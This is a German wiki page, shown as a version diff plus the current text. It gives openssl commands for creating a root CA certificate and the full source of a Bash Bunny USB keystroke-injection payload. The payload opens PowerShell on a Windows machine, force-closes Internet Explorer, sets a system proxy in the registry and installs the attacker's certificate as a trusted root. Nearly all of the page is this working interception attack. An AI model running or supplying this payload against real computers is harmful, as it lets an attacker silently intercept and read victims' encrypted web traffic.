Root Zertifikat Install: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 26: | Zeile 26: | ||
-----END CERTIFICATE----- | -----END CERTIFICATE----- | ||
=Code des Payloads= | =Code des Payloads= | ||
| + | ==payload.txt== | ||
| + | #!/bin/bash | ||
| + | # | ||
| + | #This payload will enable a proxy and import an SSL certificate to a Windows | ||
| + | #computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) | ||
| + | #The script uses a combination of Ducky Code and PowerShell. | ||
| + | # | ||
| + | # Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt | ||
| + | # | ||
| + | # Red Blinking.............Running Payload | ||
| + | # Purple Blinking .........Payload Completed | ||
| + | |||
| + | #Set Red LED to indicate Starting of Script | ||
| + | LED R 50 | ||
| + | |||
| + | #Set ATTACKMODE to HID and Storage to be able to transfer the certificate | ||
| + | ATTACKMODE HID STORAGE | ||
| + | |||
| + | #Import Bunny Helpers | ||
| + | source bunny_helpers.sh | ||
| + | |||
| + | #Start of Script | ||
| + | Q DELAY 6000 | ||
| + | Q GUI r | ||
| + | Q DELAY 100 | ||
| + | Q STRING POWERSHELL | ||
| + | Q ENTER | ||
| + | Q DELAY 100 | ||
| + | |||
| + | #Change to the directory of the Bunny with the proper switch location | ||
| + | Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name | ||
| + | Q ENTER | ||
| + | Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\' | ||
| + | Q ENTER | ||
| + | Q STRING cd \$absPath | ||
| + | Q ENTER | ||
| + | Q DELAY 500 | ||
| + | |||
| + | #Set the proxy in the internet settings in the registry (For IE and Chrome). | ||
| + | Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION \SetProxy.ps1')" | ||
| + | Q ENTER | ||
| + | Q DELAY 500 | ||
| + | |||
| + | #Import the certificate to the computer (for IE and Chrome). | ||
| + | Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION \ImportCert.ps1')" | ||
| + | Q ENTER | ||
| + | Q DELAY 1000 | ||
| + | Q ALT y | ||
| + | Q DELAY 500 | ||
| + | |||
| + | #Unmount the USB Drive. | ||
| + | Q STRING \$driveEject = New-Object -comObject Shell.Application | ||
| + | Q ENTER | ||
| + | Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\) | ||
| + | Q ENTER | ||
| + | Q DELAY 500 | ||
| + | Q ALT t | ||
| + | Q DELAY 500 | ||
| + | Q STRING EXIT | ||
| + | Q ENTER | ||
| + | sync | ||
| + | LED R B 100 | ||
| + | |||
| + | ==vars.ps1== | ||
| + | #Set variables for use in payload. | ||
| + | $proxyVal = "proxyip:port" | ||
| + | $certName = "cert.pem" | ||
| + | ==SetProxy.ps1== | ||
| + | #Import variables from vars.ps1 for use. | ||
| + | . .\vars.ps1 | ||
| + | |||
| + | #Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it. | ||
| + | Set-ExecutionPolicy RemoteSigned -Scope CurrentUser | ||
| + | $ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue | ||
| + | if ($ieProcess) { | ||
| + | $ieProcess.CloseMainWindow() | ||
| + | Sleep 5 | ||
| + | if (!$ieProcess.HasExited) { | ||
| + | $ieProcess | Stop-Process -Force | ||
| + | } | ||
| + | } | ||
| + | Remove-Variable ieProcess | ||
| + | |||
| + | #Change the proxy settings in the registry | ||
| + | $regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" | ||
| + | Set-ItemProperty -path $regKey ProxyEnable -value 1 | ||
| + | Set-ItemProperty -path $regKey ProxyServer -value $proxyVal | ||
| + | ==ImportCert.ps1== | ||
| + | #Import variables from vars.ps1 for use. | ||
| + | . .\vars.ps1 | ||
| + | |||
| + | #Add certificate to certificate store | ||
| + | $certFile = ( Get-ChildItem -Path $certName ) | ||
| + | $certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root | ||
Version vom 23. September 2021, 08:48 Uhr
Erstellen des Root Zertifikates
- openssl genrsa -out rootCAKey.pem 2048
- openssl req -x509 -sha256 -new -nodes -key rootCAKey.pem -days 3650 -out cert.pem
- openssl x509 -in cert.pem -text
-----BEGIN CERTIFICATE----- MIIDdTCCAl2gAwIBAgIUZQqjFyRux5NmF2kBbgd4+bHq48EwDQYJKoZIhvcNAQEL BQAwSjELMAkGA1UEBhMCREUxDjAMBgNVBAgMBVNUQVRFMRIwEAYDVQQHDAlOZXkg Sm9lcmsxFzAVBgNVBAoMDlhpbml4IFRlc3QgTERUMB4XDTIxMDkyMzA4MjQ1M1oX DTMxMDkyMTA4MjQ1M1owSjELMAkGA1UEBhMCREUxDjAMBgNVBAgMBVNUQVRFMRIw EAYDVQQHDAlOZXkgSm9lcmsxFzAVBgNVBAoMDlhpbml4IFRlc3QgTERUMIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0DZkcGlcpYXkdJsq5qwqsafPxtW2 E/DGFP7I/8uAdrpxOlN9kSb6ynOvTrzMeziLta7TKzMS2nmaS4miKO4bwDTWzfdH zj1X0GmS+QHHvSj1rsG63S3TrsoOhNqv2s5No3Q9KPXAE/e1Blxt8f/GbN4Qy5F4 AZ2QSF83VrAyMFi3D0NXWH0B6r1APkGq0FkCqOfnx+gdKmNzhU8B6WPuJcXk3jqS zOJRczRk99zXmipIAaE3sAsupg+jgXW3P4DbYKv4dEGB95TWrm3YOzRslDYnmZ0k 6WZc/XBw0YnAfnl58WBj+/uPAKc2MZOJD2qqYB4IYdvbsUpG2NslDU6dawIDAQAB o1MwUTAdBgNVHQ4EFgQUy87uiv8TASnEcTiiCB+Pe99PfFYwHwYDVR0jBBgwFoAU y87uiv8TASnEcTiiCB+Pe99PfFYwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0B AQsFAAOCAQEAl8V/xsWRuxrw+1XtWkuBkFxvK14JpGSlwQbKkSZIvBDGBDTTugl6 moSJHggcgRPOiocqXnx1pg9hM+VJNv1Tb6NqoZOPm53PhTFVMPHzYKU+nh9GF0zo PvgrOVisG52G9j3zZB4kV1eYMP1i+IZFdaUXcvskqsCSATKj0BGVv6ruh9dwmng6 FM1koJrg8v5/XuxnjG4Uyh7519CM52GODdmJ1sF8IYpDuCQVnqHpGlH/irfkm8Bh 7q3WC4GloI3bndsNQpejbsa0+MozVgDHlPIowdrEeNprrWC7uut1tPsLeFo/uwJr h259XktW/FFLIdwQOc6Tm532L8kvs1yIeQ== -----END CERTIFICATE-----
Code des Payloads
payload.txt
#!/bin/bash # #This payload will enable a proxy and import an SSL certificate to a Windows #computer for Internet Explorer and Chrome (FireFox is in progress for 2.0) #The script uses a combination of Ducky Code and PowerShell. # # Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt # # Red Blinking.............Running Payload # Purple Blinking .........Payload Completed
#Set Red LED to indicate Starting of Script LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate ATTACKMODE HID STORAGE
#Import Bunny Helpers source bunny_helpers.sh
#Start of Script Q DELAY 6000 Q GUI r Q DELAY 100 Q STRING POWERSHELL Q ENTER Q DELAY 100
#Change to the directory of the Bunny with the proper switch location Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name Q ENTER Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\' Q ENTER Q STRING cd \$absPath Q ENTER Q DELAY 500
#Set the proxy in the internet settings in the registry (For IE and Chrome). Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=BashBunny').Name+'payloads\\$SWITCH_POSITION \SetProxy.ps1')" Q ENTER Q DELAY 500
#Import the certificate to the computer (for IE and Chrome). Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=BashBunny').Name+'payloads\\$SWITCH_POSITION \ImportCert.ps1')" Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500
#Unmount the USB Drive. Q STRING \$driveEject = New-Object -comObject Shell.Application Q ENTER Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 500 Q ALT t Q DELAY 500 Q STRING EXIT Q ENTER sync LED R B 100
vars.ps1
#Set variables for use in payload. $proxyVal = "proxyip:port" $certName = "cert.pem"
SetProxy.ps1
#Import variables from vars.ps1 for use. . .\vars.ps1
#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
if ($ieProcess) {
$ieProcess.CloseMainWindow()
Sleep 5
if (!$ieProcess.HasExited) {
$ieProcess | Stop-Process -Force
}
}
Remove-Variable ieProcess
#Change the proxy settings in the registry $regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" Set-ItemProperty -path $regKey ProxyEnable -value 1 Set-ItemProperty -path $regKey ProxyServer -value $proxyVal
ImportCert.ps1
#Import variables from vars.ps1 for use. . .\vars.ps1
#Add certificate to certificate store $certFile = ( Get-ChildItem -Path $certName ) $certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root